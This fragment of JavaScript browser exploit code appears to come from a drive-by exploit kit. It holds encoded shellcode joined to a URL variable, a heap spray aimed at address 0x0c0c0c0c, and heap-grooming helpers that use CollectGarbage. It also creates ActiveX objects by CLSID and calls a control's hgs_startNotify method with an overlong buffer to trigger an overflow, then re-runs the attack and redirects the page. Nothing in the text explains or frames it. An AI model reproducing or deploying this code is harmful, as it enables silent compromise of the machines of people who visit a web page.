


```

"\xCC\xEF\xEF\xEF\x85\xEF\x10\x9A\xCF\x64\xAA\xE7\x85\xED\xB6\x64"+
"\xBA\xF7\x07\xFF\xEF\xEF\xEF\x85\x10\x64\xAA\xFF\x85\xEE\xB6\x64"+
"\xBA\xF7\x07\xEF\xEF\xEF\xEF\xAE\xB4\xB0\xEC\x0E\xEC\x0E\xEC\x0E"+
"\xEC\x0E\x6C\x03\xEB\xB5\xBC\x64\x35\x0D\x18\xBD\x10\x0F\xBA\x64"+
"\x03\x64\x92\xE7\x64\xB2\xE3\xB9\x64\x9C\xD3\x64\x9B\xF1\x97\xEC"+
"\x1C\xB9\x64\x99\xCF\xEC\x1C\xDC\x26\xA6\xAE\x42\xEC\x2C\xB9\xDC"+
"\x19\xE0\x51\xFF\xD5\x1D\x9B\xE7\x2E\x21\xE2\xEC\x1D\xAF\x04\x1E"+
"\xD4\x11\xB1\x9A\x0A\xB5\x64\x04\x64\xB5\xCB\xEC\x32\x89\x64\xE3"+
"\xA4\x64\xB5\xF3\xEC\x32\x64\xEB\x64\xEC\x2A\xB1\xB2\x2D\xE7\xEF"+
"\x07\x1B\x11\x10\x10\xBA\xBD\xA3\xA2\xA0\xA1\xEF"+ur1+sp1);
var hsta=0xc0c0c0c, hbs=0x100000, pl=plc.length*2, sss=hbs-(pl+0x38);
var ss=gss(addr(hsta), sss), hb=(hsta-hbs)/hbs;
if (mf){
    for (i=0; i<hb; i++) delete m[i];
    CollectGarbage();
}
for(i=0; i<hb; i++) m[i]=ss+plc;
if(!mf){
    mf=1;
    hav();
}
return 0;
}

function cobj(obj){
var ret=null;
if(obj.substring(0,1)==""){
    try{
        var clsid=obj.substring(1,obj.length-1);
        ret=document.createElement("object");
        ret.setAttribute("classid", "clsid:"+clsid);
        return ret;
    }catch(e){
        return null;
    }
}else{
    try{
        ret=new ActiveXObject(obj);
        return ret;
    }catch(e){
        return null;
    }
}
}

var padding = "AAAA";
var heapBase = 0x00150000;
var memo;

function init(maxAlloc){
while (4 + padding.length*2 + 2 < 65535)padding += padding;
memo = new Array();
flush();
}

function flush(){
delete memo["plunger"];
CollectGarbage();
memo["plunger"] = new Array();
var bytes = new Array(32, 64, 256, 32768);
for (var i = 0; i < 6; i++) {
    for(var n = 0; n < 4; n++) {
        var len = memo["plunger"].length;
        eval("memo[\"plunger\"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");
    }
}
}

function alloc(arg, tag){
var size;
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if (! memo[tag]) memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = padding.substr(0, (arg-6)/2);
}

function alloc_str(arg, tag){
var size;
size = 4 + arg.length*2 + 2;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if (! memo[tag]) memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = arg.substr(0, arg.length);
}

function free(tag) {
delete memo[tag];
CollectGarbage();
flush();
}

function crt(obj,name){
var ret=null;
try{eval('ret=obj.CreateObject(name)')}catch(e){}
if(!ret){try{eval('ret=obj.CreateObject(name, "")')}catch(e){}}
}

```



```
        var buf="";
        while(buf.length<1319)buf+="A";
        buf=buf+"\x0c\x0c\x0c\x0c"+buf;
        obj.hgs_startNotify(buf);
        setTimeout("attack(-1)",2000);
        return 1;
    }
    }catch(e){}
    setTimeout("attack(-1)",1);
    return 0;
}

if(s==1){
    setTimeout("window.location = \"\"",1);
    return 0;
}

}
attack(-9);
```